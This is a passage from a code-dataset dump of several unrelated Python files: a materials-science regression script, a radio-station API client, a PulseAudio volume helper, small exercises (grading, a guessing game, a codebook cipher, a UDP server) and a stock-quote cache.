prec","repo_name":"EmilioPeJu/epicsmonmtca","sub_path":"epicsmonmtca/ipmiutils.py","file_name":"ipmiutils.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3188824229","text":"import numpy as np\nimport pandas as pd\nfrom utils import RandomVectors, OneHotVectors\nfrom grave import FactorizationMachine\nfrom sklearn.linear_model import LinearRegression\nfrom glove import Glove\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import cross_validate\n\n\"\"\"\nBOREP: Bag of Random Embedding Projections\n\nInstead of pooling the atom vectors themselves, we'll initialize a projection matrix to compute the compound embedding:\n\nh = f(W*e)\n\nwhere h is the compound embedding, f is a pooling function, W is the projection matrix, and e is the atom vector.\n\nSee: Wieting, J., & Kiela, D. (2019). No training required: Exploring random encoders for sentence classification. \n arXiv preprint arXiv:1901.10444.\n\"\"\"\n\nif __name__ == '__main__':\n\n # model = FactorizationMachine.load_model(\"../out/all_stable_bandgap_dim20.fm.ctx10_add_cont.model\")\n # embeddings = model.W\n # converter = lambda x: x\n # dim = 20\n\n # model = RandomVectors.load(\"../out/all_stable_bandgap_dim20.random.model\")\n # embeddings = model.vectors\n # converter = lambda x: x\n # dim = 20\n\n # model = Glove.load(\"../out/all_stable_bandgap_dim20.glove.model\")\n # embeddings = model.word_vectors\n # converter = lambda x: x.lower()\n # dim = 20\n\n model = OneHotVectors.load(\"../out/all_stable_bandgap_dim20.one_hot.model\")\n embeddings = model.vectors\n converter = lambda x: x\n dim = 89\n\n df = pd.read_pickle(\"../out/all_stable_bandgap.pkl\")\n\n # regression, args = LinearRegression, {}\n regression, args = RandomForestRegressor, {\"n_estimators\": 100, \"n_jobs\": 4}\n # regression, args = MLPRegressor, {\"hidden_layer_sizes\": (100,), \"max_iter\": 500}\n\n # pool = np.mean\n pool = np.max\n\n exclude_zero = False\n # exclude_zero = True\n\n borep_dim = 200\n\n W = np.random.uniform(low=-1/np.sqrt(dim), high=1/np.sqrt(dim), size=(borep_dim, dim))\n\n X = []\n y = []\n for i in range(len(df['structure'])):\n struct = df['structure'][i]\n band_gap = df['band_gap'][i]\n\n if band_gap == 0.0 and exclude_zero:\n continue\n\n vectors = []\n for element in struct.species:\n atom_vector = np.array(embeddings[model.dictionary[converter(element.name)]])\n vectors.append(np.dot(W, atom_vector))\n X.append(pool(vectors, axis=0))\n y.append(band_gap)\n\n cv_results = cross_validate(regression(**args), X, y, cv=10, return_estimator=True,\n scoring=('r2', 'neg_root_mean_squared_error'))\n # the r2 score is the coefficient of determination, R^2, of the prediction\n print(cv_results['test_r2'])\n print(cv_results['test_neg_root_mean_squared_error'])\n\n print(\"mean fold r2 score: %s\" % np.mean(cv_results['test_r2']))\n print(\"std fold r2 score: %s\" % np.std(cv_results['test_r2']))\n print(\"mean fold neg_root_mean_squared_error score: %s\" % np.mean(cv_results['test_neg_root_mean_squared_error']))\n print(\"std fold neg_root_mean_squared_error score: %s\" % np.std(cv_results['test_neg_root_mean_squared_error']))\n","repo_name":"lantunes/materials-sandbox","sub_path":"scripts/regression_borep.py","file_name":"regression_borep.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"803810943","text":"import requests\n\nfrom pyradios.base_url import pick_base_url\nfrom pyradios.utils import type_check\n\n\nclass Request:\n def __init__(self, fmt, session=None, **kwargs):\n self._session = self._init_session(session)\n\n self._fmt = fmt\n\n if \"base_url\" in kwargs: # for tests with the responses lib\n self.base_url = kwargs.get(\"base_url\")\n else:\n self.base_url = pick_base_url()\n\n def _init_session(self, session):\n if session is None:\n return requests.Session()\n return session\n\n def get(self, endpoint, **kwargs):\n\n if \"fmt\" in kwargs:\n self._fmt = kwargs.get(\"fmt\")\n endpoint = self._fmt + \"/\" + endpoint.split(\"/\", 1)[1]\n del kwargs[\"fmt\"]\n\n if self._fmt == \"xml\":\n content_type = \"application/{}\".format(self._fmt)\n else:\n content_type = \"application/{}\".format(self._fmt)\n\n headers = {\"content-type\": content_type, \"User-Agent\": \"pyradios/dev\"}\n\n url = self.base_url + endpoint\n\n resp = self._session.get(url, headers=headers, params=kwargs)\n\n if resp.status_code == 200:\n if self._fmt == \"xml\":\n # return resp.text\n return resp.content\n return resp.json()\n\n return resp.raise_for_status()\n\n\nclass RadioBrowser:\n \"\"\"This class implements the main interface for the Radio Browser API.\n\n Args:\n session (obj, optional): The `requests_cache.CachedSession` instance.\n\n Examples:\n To create an instance of the RadioBrowser class with cached session\n\n >>> from pyradios import RadioBrowser\n >>> from requests_cache import CachedSession\n >>> import datetime\n >>> from datetime import timedelta\n >>> expire_after = timedelta(days=3)\n >>> session = CachedSession(\n ... cache_name='cache',\n ... backend='sqlite',\n ... expire_after=expire_after)\n >>> rb = RadioBrowser(session=session)\n >>> rb.countries()\n\n No cahce\n\n >>> import pyradios\n >>> rb = pyradios.RadioBrowser()\n >>> rb.countries()\n\n Note:\n Run `pip install requests_cache` to use cached session.\n\n \"\"\"\n\n def __init__(self, fmt=\"json\", session=None, **kwargs):\n\n self._fmt = fmt\n self.client = Request(self._fmt, session, **kwargs)\n\n @type_check\n def countries(self, code=None):\n \"\"\"Lists all countries.\n\n Args:\n code (str, optional): Filter by country code. Defaults to None.\n\n Returns:\n list: Countries.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_countries\n \"\"\"\n\n if code:\n endpoint = \"{fmt}/countrycodes/{code}\".format(\n fmt=self._fmt, code=code\n )\n else:\n endpoint = \"{fmt}/countrycodes/\".format(fmt=self._fmt)\n return self.client.get(endpoint)\n\n @type_check\n def countrycodes(self, code=None):\n \"\"\"Lists all countries.\n\n Args:\n code (str, optional): Filter by country code. Defaults to None.\n\n Returns:\n list: Countries.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_countrycodes\n \"\"\"\n\n if code:\n endpoint = \"{fmt}/countrycodes/{code}\".format(\n fmt=self._fmt, code=code\n )\n else:\n endpoint = \"{fmt}/countrycodes/\".format(fmt=self._fmt)\n return self.client.get(endpoint)\n\n @type_check\n def codecs(self, codec=None):\n \"\"\"Lists all codecs.\n\n Args:\n codec (str, optional): Filter by codec. Defaults to None.\n\n Returns:\n list: Codecs.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_codecs\n \"\"\"\n\n endpoint = \"{fmt}/codecs/\".format(fmt=self._fmt)\n\n if codec:\n response = self.client.get(endpoint)\n return list(\n filter(\n lambda _codecs: _codecs[\"name\"].lower() == codec.lower(),\n response,\n )\n )\n\n return self.client.get(endpoint)\n\n @type_check\n def states(self, country=None, state=None):\n \"\"\"Lists all states.\n\n Args:\n country (str, optional): Filter by country. Defaults to None.\n state (str, optionla): Filter by state. Defaults to None.\n\n Returns:\n list: States.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_states\n \"\"\"\n\n endpoint = \"{fmt}/states\".format(fmt=self._fmt)\n\n if country and state:\n\n response = self.client.get(endpoint)\n return list(\n filter(\n lambda _state: _state[\"country\"].lower() == country.lower()\n and _state[\"name\"].lower() == state.lower(),\n response,\n )\n )\n\n if country:\n response = self.client.get(endpoint)\n return list(\n filter(\n lambda _state: _state[\"country\"].lower()\n == country.lower(),\n response,\n )\n )\n if state:\n response = self.client.get(endpoint)\n return list(\n filter(\n lambda _state: _state[\"name\"].lower() == state.lower(),\n response,\n )\n )\n return self.client.get(endpoint)\n\n @type_check\n def languages(self, language=None):\n \"\"\"Lists all languages.\n\n Args:\n language (str, optional): Filter by language. Defaults to None.\n\n Returns:\n list: Languages.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_languages\n \"\"\"\n if language:\n endpoint = \"{fmt}/languages/{language}\".format(\n fmt=self._fmt, language=language\n )\n else:\n endpoint = \"{fmt}/languages/\".format(fmt=self._fmt)\n\n return self.client.get(endpoint)\n\n @type_check\n def tags(self, tag=None):\n \"\"\"Lists all tags.\n\n Args:\n tag (str, optional): Filter by tag. Defaults to None.\n\n Returns:\n list: Tags.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_tags\n \"\"\"\n\n if tag:\n endpoint = \"{fmt}/tags/{tag}\".format(fmt=self._fmt, tag=tag)\n else:\n endpoint = \"{fmt}/tags/\".format(fmt=self._fmt)\n\n return self.client.get(endpoint)\n\n def station_by_uuid(self, stationuuid):\n \"\"\"Radio station by stationuuid.\n\n Args:\n stationuuid (str): A globally unique identifier for the station.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n endpoint = \"{fmt}/stations/byuuid/{uuid}\".format(\n fmt=self._fmt, uuid=stationuuid\n )\n return self.client.get(endpoint)\n\n def stations_by_name(self, name, exact=False, **kwargs):\n \"\"\"Lists all radio stations by name.\n\n Args:\n name (str): The name of the station.\n reverse (bool): Reverse the result list if set to True.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"name\": name, \"name_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_codec(self, codec, exact=False, **kwargs):\n \"\"\"Lists all radio stations by codec.\n\n Args:\n codec (str): The name of the codec.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"code\": codec, \"codec_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_country(self, country, exact=False, **kwargs):\n \"\"\"Lists all radio stations by country.\n\n Args:\n country (str): The name of the country.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"country\": country, \"country_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_countrycode(self, code, **kwargs):\n \"\"\"Lists all radio stations by country code.\n\n Args:\n code (str): Official countrycodes as in ISO 3166-1 alpha-2.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"countrycode\": code})\n return self.search(**kwargs)\n\n def stations_by_state(self, state, exact=False, **kwargs):\n \"\"\"Lists all radio stations by state.\n\n Args:\n state (str): The name of the state.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"state\": state, \"state_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_language(self, language, exact=False, **kwargs):\n \"\"\"Lists all radio stations by language.\n\n Args:\n language (str): The name of the language.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"language\": language, \"language_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_tag(self, tag, exact=False, **kwargs):\n \"\"\"Lists all radio stations by tag.\n\n Args:\n tag (str): The name of the tag.\n\n Returns:\n list: Stations.\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"tag\": tag, \"tag_exact\": exact})\n return self.search(**kwargs)\n\n def click_counter(self, stationuuid):\n \"\"\"Increase the click count of a station by one.\n\n This should be called everytime when a user starts\n playing a stream to mark the stream more popular than others.\n Every call to this endpoint from the same IP address and for\n the same station only gets counted once per day. The call will\n return detailed information about the stream, supported output\n formats: JSON\n\n Args:\n stationuuid (str): A globally unique identifier for the station.\n\n Returns:\n dict: A dict containing informations about the radio station.\n\n See details:\n https://de1.api.radio-browser.info/#Count_station_click\n \"\"\"\n endpoint = \"{fmt}/url/{uuid}\".format(fmt=self._fmt, uuid=stationuuid)\n\n return self.client.get(endpoint)\n\n def stations(self, **kwargs):\n \"\"\"Lists all radio stations.\n\n Returns:\n list: Stations.\n\n See details:\n https://nl1.api.radio-browser.info/#List_of_all_radio_stations\n \"\"\"\n endpoint = \"{fmt}/stations\".format(fmt=self._fmt)\n return self.client.get(endpoint, **kwargs)\n\n @type_check\n def search(self, **kwargs):\n \"\"\"Advanced search.\n\n It will search for the station whose attribute\n contains the search term.\n\n Args:\n name (str, optional): Name of the station.\n name_exact (bool, optional): Only exact matches, otherwise all\n matches (default: False).\n country (str, optional): Country of the station.\n country_exact (bool, optional): Only exact matches, otherwise\n all matches (default: False).\n countrycode (str, optional): 2-digit countrycode of the station\n (see ISO 3166-1 alpha-2)\n state (str, optional): State of the station.\n state_exact (bool, optional): Only exact matches, otherwise all\n matches. (default: False)\n language (str, optional): Language of the station.\n language_exact (bool, optional): Only exact matches, otherwise\n all matches. (default: False)\n tag (str, optional): Tag of the station.\n tag_exact (bool, optional): Only exact matches, otherwise all\n matches. (default: False)\n tag_list (str, optional): A comma-separated list of tag.\n bitrate_min (int, optional): Minimum of kbps for bitrate field of\n stations in result. (default: 0)\n bitrate_max (int, optional): Maximum of kbps for bitrate field of\n stations in result. (default: 1000000)\n order (str, optional): The result list will be sorted by: name,\n url, homepage, favicon, tags, country, state, language, votes,\n codec, bitrate, lastcheckok, lastchecktime, clicktimestamp,\n clickcount, clicktrend, random\n reverse (bool, optional): Reverse the result list if set to true.\n (default: false)\n offset (int, optional): Starting value of the result list from\n the database. For example, if you want to do paging on the\n server side. (default: 0)\n limit (int, optional): Number of returned datarows (stations)\n starting with offset (default 100000)\n hidebroken (bool, optional): do list/not list broken stations.\n Note: Not documented in the \"Advanced Station Search\".\n\n Returns:\n list: Stations.\n\n Example:\n >>> from pyradios import RadioBrowser\n >>> rb = RadioBrowser()\n >>> rb.search(name='BBC Radio 1', name_exact=True)\n\n See details:\n https://de1.api.radio-browser.info/#Advanced_station_search\n \"\"\"\n endpoint = \"{fmt}/stations/search\".format(fmt=self._fmt)\n return self.client.get(endpoint, **kwargs)\n\n","repo_name":"hxebolax/zRadio","sub_path":"addon/globalPlugins/zRadio/pyradios/radios.py","file_name":"radios.py","file_ext":"py","file_size_in_byte":14214,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6883719455","text":"from __future__ import annotations\nfrom typing import Optional\n\nimport os\nimport re\nimport logging\n\nfrom .bar_display import BarDisplay\nfrom .execute import execute\n\nlogger = logging.getLogger(__name__)\n\n\nclass PaCtl:\n def __init__(self, sink: int=0, bar_display: Optional[BarDisplay]=None) -> None:\n self._sink = sink\n self._display = bar_display\n self._matcher = re.compile(r\".*?(\\d+)%.*\")\n\n def mute(self) -> None:\n os.system(\"pactl set-sink-mute %d toggle &\" % self._sink)\n if self._display is not None:\n self._display.display(0.)\n\n def volume_adj(self, perc: int) -> None:\n os.system(\"pactl set-sink-volume %d %+d%% &\" % (self._sink, perc))\n if self._display is not None:\n vol = execute(\"pactl list sinks | grep '^[[:space:]]Volume:' | head -n $(( %d + 1 )) | tail -n 1\" % self._sink)\n match = self._matcher.match(vol)\n if match is not None:\n self._display.display(float(match.group(1))/100.)\n\n\n","repo_name":"jbuchermn/newm","sub_path":"newm/helper/pactl.py","file_name":"pactl.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":921,"dataset":"github-code","pt":"53"} +{"seq_id":"18299872219","text":"import sys\nimport json\nfrom types import SimpleNamespace\n# Given a student's score on a test, return a letter grade\n\ngradeNS = SimpleNamespace(\n\taHigh= 100,\n\taLow= 90,\n\tbHigh= 89,\n\tbLow= 80,\n\tcHigh= 79,\n\tcLow= 70,\n\tdHigh= 69,\n\tdLow= 60,\n\tfHigh= 59,\n\tfLow= 0\n)\n\ndef convertPercentToGrade(val, gradeNS):\n\tif gradeNS.fLow <= val <= gradeNS.fHigh:\n\t\treturn 'F'\n\telif gradeNS.dLow <= val <= gradeNS.dHigh:\n\t\treturn 'D'\n\telif gradeNS.cLow <= val <= gradeNS.cHigh:\n\t\treturn 'C'\n\telif gradeNS.bLow <= val <= gradeNS.bHigh:\n\t\treturn 'B'\n\telif gradeNS.aLow <= val <= gradeNS.aHigh:\n\t\treturn 'A'\n\telse:\n\t\treturn 'ERROR - Out of bounds'\n\ndef gradeToLetter(val, total, gradeNS):\n\tif val > 100 and (not bool(total)):\n\t\tprint(UserWarning('ERROR - Values over 100 need a \"total\" arg to divide by'))\n\telif not total:\n\t\tprint(f\"Grade: {convertPercentToGrade(val, gradeNS)}\")\n\telif total:\n\t\tprint(f\"Grade: {convertPercentToGrade(val / total * 100, gradeNS)} - {val / total * 100}\")\n\telse:\n\t\tprint('invalid value')\n\ndef handleInput():\n\t'''\n\tTakes up to 3 arguments\n\t\tval: value as percentage correct\n\t\ttotal: changes functionality to # correct out of 'total'\n\t\tgradeNS: user provided JSON object to change the default scoring\n\t\t\t- keys must use double quotes\n\t\t\t- e.g. ... 10 10 '{\"aHigh\": 50, \"aLow\": 20, ... }'\n\t'''\n\ttry:\n\t\tuserBaseVal = int(sys.argv[1]) if len(sys.argv) > 1 else int(input(\"What's the grade / value? \"))\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn\n\n\ttry:\n\t\ttotalValInput = sys.argv[2] if len(sys.argv) > 2 else input(\"Opt: Total points? \")\n\t\tuserTotalVal = int(totalValInput) if bool(totalValInput) else False\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn\n\n\tuserGradeNS = sys.argv[3] if len(sys.argv) > 3 else input(\"Opt: Custom grading?\\n\")\n\tif len(userGradeNS):\n\t\ttry:\n\t\t\tparseGradeNS = json.loads(\n\t\t\t\tuserGradeNS,\n\t\t\t\tobject_hook=lambda d: SimpleNamespace(**d)\n\t\t\t)\n\t\texcept json.decoder.JSONDecodeError as e:\n\t\t\tprint(\"Does the provided object start with quotes? eg: '{...}' \")\n\t\t\tprint(f\"{type(e).__name__} at line {e.__traceback__.tb_lineno} of {__file__}: {e}\")\n\t\t\treturn\n\n\tgradeToLetter(\n\t\tuserBaseVal,\n\t\tuserTotalVal,\n\t\tparseGradeNS if bool(userGradeNS) else gradeNS\n\t)\n\nhandleInput()\n\n'''\npython grade-to-letter.py 10 100 '{\"aHigh\": 100,\"aLow\": 90,\"bHigh\": 89,\"bLow\": 80,\"cHigh\": 79,\"cLow\": 70,\"dHigh\": 69,\"dLow\": 60,\"fHigh\": 59,\"fLow\": 0}'\n'''","repo_name":"JoshMLeslie/learning-python","sub_path":"grade-to-letter.py","file_name":"grade-to-letter.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18099515677","text":"from search import *\nimport os, sys\nfrom acrcloud.recognizer import ACRCloudRecognizer\nimport json\nimport eye\n\nif __name__ == '__main__':\n config = {\n 'host':'XXX',\n 'access_key':'XXX', \n 'access_secret':'XXX',\n 'timeout':10 # seconds\n }\n\n re = ACRCloudRecognizer(config)\n\n\n result= re.recognize_by_file(sys.argv[1], 0)\n audiof = eyed3.load(sys.argv[1])\n \n result1 = json.loads(result)\n\n status = result1['status']\t\n\n music = (result1['metadata'])['music']\n album = ((music[0])['album'])['name']\n title = (music[0])['title']\n artists = (((music[0])['artists'])[0])['name']\n \n get_image(title)\n try:\n \timage = open(title + \".jpg\", \"rb\").read()\n\n except IOError:\n \timage = open(title + \".png\", \"rb\").read()\n \n audiof.tag.images.set(3, image, \"image/jpeg\")\n audiof.tag.artist = artists\n audiof.tag.album = album\n audiof.tag.title = title\n audiof.tag.save()\n \n","repo_name":"akhilabrahamt/mp3-metadata-edit","sub_path":"medit.py","file_name":"medit.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3591802304","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n#=============================================================================\n# FileName:\n# Desc:\n# Author: 白开水\n# Email: vekergu@163.com\n# HomePage: https://github.com/vekergu\n# Version: 0.0.1\n# LastChange: \n# History:\n#=============================================================================\nfrom __future__ import print_function\n'''\n题目:时间函数举例4,一个猜数游戏,判断一个人反应快慢。\n'''\n\nimport time\nimport random\n\nplay_it = raw_input('do you want to play it.(\\'y\\' or \\'n\\')')\nwhile play_it == \"y\":\n c = raw_input('input a character:\\n')\n i = random.randint(0,2**32) % 100\n print('please input number you guess:\\n')\n start = time.clock()\n guess = int(raw_input('input you gess:\\n'))\n while guess != i:\n if guess > i:\n print(\"大了\")\n guess = int(raw_input('input your guess:\\n'))\n else:\n print('小了')\n guess = int(raw_input('input your guess:\\n'))\n end = time.clock()\n b = time.time()\n\n var = (end - start) / 18.2\n print(end - start)\n\n if var < 15:\n print('you are very clever!')\n elif var < 25:\n print('you are normal!')\n else:\n print('you are stupid!')\n\n print('Congradulations')\n print('The number you guess is %d' %i)\n play_it = raw_input('do you want to play it.')","repo_name":"vekergu/ops_doc","sub_path":"learn_python/python练习100题/094-时间函数.py","file_name":"094-时间函数.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34091006165","text":"from util.DateUtil import DateUtil\nfrom db.SqlExecutor import SqlExecutor\n\n\nclass HAVCache:\n def __init__(self):\n self.db = SqlExecutor(db_name='gpp-long-term.db')\n\n # check if we already have cached data for the provided date\n def has_data_for_date(self, ticker, date, no_update_if_today=False):\n found_date = self.get_last_retrieved(ticker)\n # if no found date, then it isn't in the cache at all\n if found_date is None:\n return False\n\n # found_date is saturday or sunday and is today, don't update cache\n if DateUtil.dates_match(date, found_date) and DateUtil.is_weekend(date) and DateUtil.is_today(date):\n return True\n\n # if the date is today and it isn't the weekend, we need to update our cache always\n if DateUtil.is_today(date) and not no_update_if_today:\n return False\n\n # if the date in the metadata is greater than the requested date\n # we already have data for this date, otherwise we need to go get it\n return found_date > date or (no_update_if_today and DateUtil.is_today(date))\n\n def store_result_meta_data(self, ticker, last_retrieved):\n found = self.get_last_retrieved(ticker)\n\n # if there's already a metadata record, just update it\n if found is not None:\n sql = 'UPDATE `HISTORIC_META_DATA` SET LAST_RETRIEVED=? WHERE TICKER=?'\n self.db.exec_insert(sql, (last_retrieved, ticker))\n else:\n sql = 'INSERT INTO `HISTORIC_META_DATA` (TICKER, LAST_RETRIEVED) VALUES (?, ?)'\n self.db.exec_insert(sql, (ticker, last_retrieved))\n\n def store_result_data(self, ticker, date, payload):\n sql = 'INSERT INTO `HISTORIC_DATA` (TICKER, DATE, OPEN, HIGH, LOW, CLOSE, VOLUME) ' \\\n 'VALUES(?, ?, ?, ?, ?, ?, ?)'\n\n # check to make sure we're not overwriting something\n data = self.get_daily_quote(ticker, date)\n if data is not None:\n self.db.exec_insert('DELETE FROM `HISTORIC_DATA` WHERE `TICKER`=? AND `DATE`=?', (ticker, date))\n\n to_send = (ticker, date)\n for item in payload:\n to_send = to_send + (item,)\n\n self.db.exec_insert(sql, to_send)\n\n # Checks whether specific date is actually in the cache\n def check_cache(self, ticker, date):\n # don't try the DB before we know if the data will be there\n if not self.has_data_for_date(ticker, date):\n return None\n\n result = self.get_daily_quote(ticker, date)\n if result is None:\n return None\n\n return {'ticker': result[0], 'date': result[1], 'open': result[2],\n 'high': result[3], 'low': result[4], 'close': result[5], 'volume': result[6]}\n\n def get_last_retrieved(self, ticker):\n sql = 'SELECT * FROM `HISTORIC_META_DATA` WHERE TICKER=?'\n result = self.db.exec_select(sql, (ticker,)).fetchone()\n if result is None:\n return None\n\n found_timestamp = result[1]\n return found_timestamp\n\n def get_all_data(self, ticker):\n sql = 'SELECT * FROM `HISTORIC_DATA` WHERE TICKER=?'\n result = self.db.exec_select(sql, (ticker,)).fetchall()\n return result\n\n def get_rolling_window_quotes(self, ticker, end_date, num_desired):\n if not self.has_data_for_date(ticker, end_date, no_update_if_today=True):\n return None\n\n sql = 'SELECT * FROM `HISTORIC_DATA` WHERE TICKER=? AND DATE <= ? ORDER BY DATE DESC LIMIT ?'\n result = self.db.exec_select(sql, (ticker, end_date, num_desired)).fetchall()\n return result\n\n def get_daily_quote(self, ticker, date):\n sql = 'SELECT * FROM `HISTORIC_DATA` WHERE TICKER=? AND DATE=?'\n result = self.db.exec_select(sql, (ticker, date)).fetchone()\n return result\n\n def flush(self, ticker):\n sql = 'DELETE FROM `HISTORIC_DATA` WHERE TICKER=?'\n self.db.exec_insert(sql, (ticker,))\n","repo_name":"michaelalbinson/glowing-pancake-praw","sub_path":"api/alpha_vantage/HAVCache.py","file_name":"HAVCache.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38388983247","text":"def makeCodebook():\n decbook = {'5':'a', '2':'b', '#':'d', '8':'e', '1':'f', '3':'g', '4':'h', '6':'i', '0':'l', '9':'m','*':'n', '%':'o', '=':'p', '(':'r', ')':'s', ';':'t', '?':'u', '@':'v', ':':'y', '7':' '}\n encbook = {}\n \n for x in decbook : \n encbook[decbook[x]] = x\n\n return decbook, encbook\n\n# decbook = {'5':'a', '2':'b', '#':'d', '8':'e', '1':'f', '3':'g', '4':'h', '6':'i', '0':'l', '9':'m','*':'n', '%':'o', '=':'p', '(':'r', ')':'s', ';':'t', '?':'u', '@':'v', ':':'y', '7':' '}\ndef decode(inp, dec):\n \n for x in inp :\n # print(x)\n if x in dec :\n inp = inp.replace(x, dec[x])\n # print(inp)\n return inp\n\ndef encode(inp, enc):\n for x in inp :\n # print(x)\n if x in enc :\n inp = inp.replace(x, enc[x])\n # print(inp)\n return inp\n\n# def encode(input):\n# output = input\n# return output\n# inp = \"2222222222\"\n# for x in inp :\n# print(if x in decbook)\n\nif __name__ == \"__main__\":\n plaintext =\"this is my life hello hello world\" \n dec, enc =makeCodebook()\n enctext = encode(plaintext, enc)\n print(enctext)\n dectext = decode(enctext, dec)\n print(dectext)\n","repo_name":"ace2267/pythonExam","sub_path":"secureCode/1_encdecBookUtil.py","file_name":"1_encdecBookUtil.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31069896813","text":"import socket\nimport random\nimport string\nfrom time import localtime, strftime\n\n# METODAT\n\n\"\"\" Metoda qe kthen IP adresen e klientit perkates.\n Kjo metode, ashtu si edhe metoda PORTI si parameter e marrin adresen e\n klientit e cila i permban dy vlera (HOSTin dhe PORTin).\n\"\"\"\n\n\ndef IPADDRESS(address):\n return address[0]\n\n\ndef PORTI(address):\n return address[1]\n\n\ndef COUNT(text):\n text = text.lower()\n nrz = 0\n nrb = 0\n for x in text:\n if x == 'a' or x == 'e' or x == 'i' or x == 'u' or x == 'o':\n nrz += 1\n elif x >= 'a' and x <= 'z':\n nrb += 1\n final = \"Teksti i pranuar permban \" + str(nrz) + \" zanore dhe \" + str(nrb) + \" bashketingellore.\"\n return final\n\n\ndef REVERSE(text):\n backw = \"\"\n gjatesia = len(text)\n for x in range(gjatesia):\n backw += text[gjatesia - 1]\n gjatesia -= 1\n return backw.strip() # e kthen tekstin reverse me hapesirat e fillimit dhe te fundit te larguara\n\n\n# Kërkon nje fjali dhe tregon a eshte fjalia palindrome (True) apo jo (False)\n\ndef PALINDROME(text):\n backw = \"\"\n gjatesia = len(text)\n for x in range(gjatesia):\n backw += text[gjatesia - 1]\n gjatesia -= 1\n if text == backw:\n return str(True)\n else:\n return str(False)\n\n\ndef TIME():\n return strftime(\"%Y-%m-%d %H:%M:%S PM\", localtime())\n\n\ndef GAME():\n lista = []\n\n while len(lista) != 5:\n y = random.randint(1, 36)\n if y not in lista:\n lista.append(y)\n\n listToStr = ', '.join([str(elem) for elem in lista])\n return listToStr\n\n\ndef CONVERT(number, option):\n if option == \"CMTOFEET\":\n return str(round((number * 0.0328084), 2)) + \"ft\"\n elif option == \"FEETTOCM\":\n return str(round((number / 0.0328084), 2)) + \"cm\"\n elif option == \"KMTOMILES\":\n return str(round((number * 0.621371), 2)) + \"miles\"\n elif option == \"MILESTOKM\":\n return str(round((number / 0.621371), 2)) + \"km\"\n else:\n return \"Invalid option choosen.\"\n\n\ndef GCF(x, y):\n while y != 0:\n (x, y) = (y, x % y)\n return str(x)\n\n\ndef CALCULATE(x, op,\n *n): # *n nenkupton qe parametrat pas x dhe op jane opsional. Kjo sepse metoda CALCULATE ka operacione ku nuk duhet argumenti i trete\n x = float(x)\n if len(n) > 1:\n return (\"CALCULATE pranon vetem tre argumente.\")\n pass\n y = 0\n for nr in n:\n y = float(nr)\n if op == \"SQRT\":\n return round((x ** (1 / 2)), 2)\n elif op == \"%\":\n return (x * (0.01) * y)\n elif op == \"+\":\n return x + y\n elif op == \"-\":\n return x - y\n elif op == \"*\":\n return x * y\n elif op == \"/\":\n return x / y\n elif op == \"^\":\n return x ** y\n\n\ndef password(gjatesia):\n gjatesia = int(gjatesia)\n chars = string.ascii_letters + string.digits + string.punctuation\n lista = []\n for x in range(gjatesia):\n lista.append(random.choice(chars))\n return ''.join(lista)\n\n\n# ----------------------------------------------------------------------------------------\n\n\n# SOCKET\n\ntry:\n HOST = 'localhost'\n PORT = 13000\n UDPserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n print(\"Socket is being created...\")\nexcept socket.error as err:\n print(\"Error while creating socket\", err)\n\n\ndef socketBinding():\n try:\n global HOST\n global PORT\n global UDPserver\n UDPserver.bind((HOST, PORT))\n print(\"\\nServeri eshte startuar ne localhost me portin: \" + str(PORT))\n print(\"Serveri eshte duke pritur per ndonje kerkese\\n\"\n \"---------------------------------------------\")\n except socket.error as err:\n print(\"Bind failed. Error: \", err)\n print(\"\\nKontrolloni IP adresen dhe PORTIN qe e keni dhene.\\n\")\n HOST = input(\"Jepni IP adresen perseri: \")\n try:\n PORT = int(input(\"Jepni PORTin perseri: \"))\n except (ValueError, 